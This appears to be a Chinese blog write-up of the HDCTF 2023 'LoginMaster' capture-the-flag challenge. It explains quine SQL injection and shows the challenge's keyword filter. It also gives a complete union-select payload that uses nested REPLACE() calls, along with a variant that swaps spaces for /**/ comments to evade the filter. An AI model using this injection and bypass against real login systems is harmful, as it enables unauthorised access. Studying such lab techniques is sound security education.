[HDCTF 2023]LoginMaster(quine注入)

最新推荐文章于 2024-08-27 16:09:26 发布
最新推荐文章于 2024-08-27 16:09:26 发布
阅读量169 收藏 6
点赞数 10
文章标签: 网络安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80307383/article/details/141072414
版权

题目来源:[HDCTF 2023]LoginMaster | NSSCTF

quine注入原理:SQL注入之Quine | skkyblu3 (kksky.blue)

从三道赛题再谈Quine trick-安全客 - 安全资讯平台 (anquanke.com)

1.直接用万能密码测试提示只有admin能登录,接着尝试访问robots.txt提示代码为

function checkSql($s) 
{
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}
if ($row['password'] === $password) {
        die($FLAG);
    } else {
    alertMes("wrong password",'index.php');

有很多字符被过滤,而且要满足输入的输入的password与表中password相同

2.看了别人的wp之后,了解到了quine注入这种方式,要满足语句

if ($row['password'] === $password)

但其实这张表是空表,没有password字段,这时就要用quine注入使得输入结果与输出结果相同

3.简单分享我对quine注入的理解

要进行quine注入首先要知道要用的函数replace

REPLACE ( string_expression , string_pattern , string_replacement )

即将string_expression中所有string_pattern替换为string_replacement

利用如下语句时

select replace(replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'replace(replace(".",char(34),char(39)),char(46),".")');

会使输入值与查询结果完全相同,具体实现过程看上面的链接,有全面的解释

4.本题payload

1' union select replace(replace('1" union select replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1" union select replace(replace(".",char(34),char(39)),char(46),".")#')#

空格,更换为/**/即可

1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

记嘚开心壹点
关注
  • 10
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[NISACTF 2022]hardsql - quine注入
oZuoShen123的博客
10-05 620
题目描述:`$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";` 从描述看出是quine注入,且用户名要是bilala 1、经测试,参数为:username=&passwd=&login=登录,username必须为bilala 2、【= and 空格】被过滤【like or /**/】 3、参考文章:https://blog.csdn.ne
[HDCTF 2023]LoginMaster 复现 (记quine注入
qq_73767109的博客
04-24 916
benchmark时间盲注 [HDCTF 2023]LoginMaster 复现 quine注入解释
HDCTF 2023 复现
weixin_63231007的博客
07-11 1186
web yaml反序列化&quine注入&Apache SCXML2 RCE pwn 栈迁移&格式化字符串 crypto RSA
[HDCTF2023] NSSweb方向题解
Leaf_initial的博客
05-06 1737
Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别。了解过Jinjia2模板注入的同学应该知道,jinjia2是基于python的,而Smarty是基于PHP的,所以理解起来还是很容易,我们只需要达到命令执行就可以了。
HDCTF 2023 复盘
arcuied
04-24 775
HDCTF2023 当时做了一半做不出来的题复盘
记录一次quine注入的学习
Zh1A0的博客
08-24 902
记录一次sql注入Quine注入的学习
Quine-McCluskey_algorithm_(Java).zip_quine mccluskey _quine-mccl
09-24
Quine-McCluskey算法(也称为QMC算法)是一种简化布尔表达式的方法,用于减少布尔函数的项数,从而提高逻辑电路的设计效率。在计算机科学和电子工程领域,这个算法尤其重要,因为它能够帮助优化逻辑设计,降低硬件...
Quine-McClusky(实现计算机辅助逻辑化简功能,C、C++、python)
05-25
该文件是利用Quine-McClusky算法实现计算机逻辑化简功能,共包含C++、C、python三种语言实现代码,且三种的数据结构和中间算法均不相同。每个均包含实验报告和代码,是非常好的学习数字电路中的计算机辅助逻辑化简。...
quine-relay:具有100多种编程语言的uroboros程序
02-16
奎因继电器 这是什么 这是一个生成Rust程序的Ruby程序,该生成Rust的程序生成Scala程序,该Scala程序生成...(总共通过128种语言)。REXX程序再次生成原始Ruby代码。 (如果要查看旧的50语言版本,请参阅分支。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8422
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
SQL统计行数的语句
曹昆的技术博客
08-27 114
SQL 中,你可以使用 COUNT() 函数来统计查询结果的行数。这个函数可以用在不同的上下文中,具体取决于你想要统计的内容。
漏洞披露-金慧-综合管理信息系统-SQL
最新发布
无问社区的博客
08-27 240
金慧数据资产管理平台是一款企业级数据资产管理软件,其基于先进的技术架构,具备操作简单、部署灵活、快速响应等特点。由于金慧-综合管理信息系统 LoginBegin.aspx(登录接口处)没有对外部输入的SQL语句进行严格的校验和过滤,直接带入数据库执行,导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
SQL】关注者数量
Frost_Descent的博客
08-23 571
(user_id, follower_id) 是这个表的主键(具有唯一值的列的组合)。count计数,count(follower_id) followers_count。该表包含一个关注关系中关注者和用户的编号,其中关注者关注用户。使用order by升序排列order by user_id。编写解决方案,对于每一个用户,返回该用户的关注者数量。按照用户id分组,group by user_id。查询结果的格式如下示例所示。2 的关注者有 {0,1}0 的关注者有 {1}1 的关注者有 {0}
出现Property ‘sqlSessionFactory‘ or ‘sqlSessionTemplate‘ are requiredProperty报错
m0_74436895的博客
08-23 738
SpringBootApplication,它组合了@Configuration, @EnableAutoConfiguration, 和 @ComponentScan注解的功能。我在使用一个验证码生成的工具asy-captcha库的验证码接口遇到javax.script.ScriptEngine.eval调用失败的问题,因为engine为null。1.启动类 里配置的 (@MapperScan(“com.example.demo.dao.mapper”)),这里开始配置错了。n若有添加,尝试删除。
SQL-DCL-数据控制语言
DEVIL_hym的博客
08-23 283
一、 DCL-管理用户。二、DCL-权限控制。
SQL进阶技巧:如何按任意时段分析时间区间问题? | 分区间讨论【左、中、右】
石榴姐yyds
08-23 142
本文分析了一种按任意时段计算时间区间问题的方法和思路,其本质是区间重叠问题的应用,文中给出了两种方法,一种按照区间重叠的方式进行分情况讨论划分区间,找出重叠区间,并计算问题,一种按照区间展开的形式形成全量的明细表,基于明细表求解任意给定的时段统计问题
基于SSM的在线家教管理系统的设计与实现 (含源码+sql+视频导入教程+论文+PPT)
coderWangbuer的博客
08-24 794
基于SSM的在线家教管理系统拥有三个角色 管理员:用户管理、教师管理、简历管理、申请管理、课程管理、招聘教师管理、应聘管理、评价管理等 教师:课程管理、应聘职位、简历管理等 用户:申请教师等
【PGCCC】PostgreSQL 死锁揭秘:如何检测与解决死锁问题的详细指南
PGCCC的博客
08-23 1004
PostgreSQL 的死锁检测机制通过锁等待图的构建和环路检测,能够有效地识别和处理死锁问题。了解其工作原理和处理策略对于优化数据库性能和提高系统稳定性至关重要。在实际应用中,及时分析和处理死锁情况,并优化数据库操作,可以减少死锁的发生,从而提升数据库的整体效率。
quine-mccluskey method
11-30
Quine-McCluskey方法是一种用于最小化布尔函数的方法。它通过将布尔函数转换为最简化的多项式形式,以便更容易地实现或设计电路。 该方法的基本思想是使用卡诺图(Karnaugh map)的拓展版本来找到所有的重要项。首先,将布尔函数的真值表转化为卡诺图,然后根据卡诺图中的相邻位单元(最大化相邻的1)进行合并。这些合并操作可以产生更小的项,将真值表中不必要的变量进行消除,最终得到最简化的布尔表达式。 在使用Quine-McCluskey方法时,以下步骤是关键的: 1. 将布尔函数的真值表转换为卡诺图,并将1的位填入相应的格子中。 2. 找到卡诺图中所有的重要项-这些项代表着最后的布尔表达式中的主要组成部分。 3. 按照卡诺图的规则合并相邻位单元(最大化1的位数)。这些合并操作将产生更小的项,减少布尔表达式的复杂性。 4. 继续合并、消除和处理其他重要项,直到不能再进行合并操作为止。 5. 最后,根据卡诺图的结果,得到最简化的布尔表达式。 Quine-McCluskey方法是一种有效的方法,可以用于减少布尔函数的大小,并简化相应的电路设计过程。尽管手工计算非常费时且容易出错,但现代计算机系统可以自动化这一过程,使得设计人员能够更快速、准确地处理复杂的布尔函数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值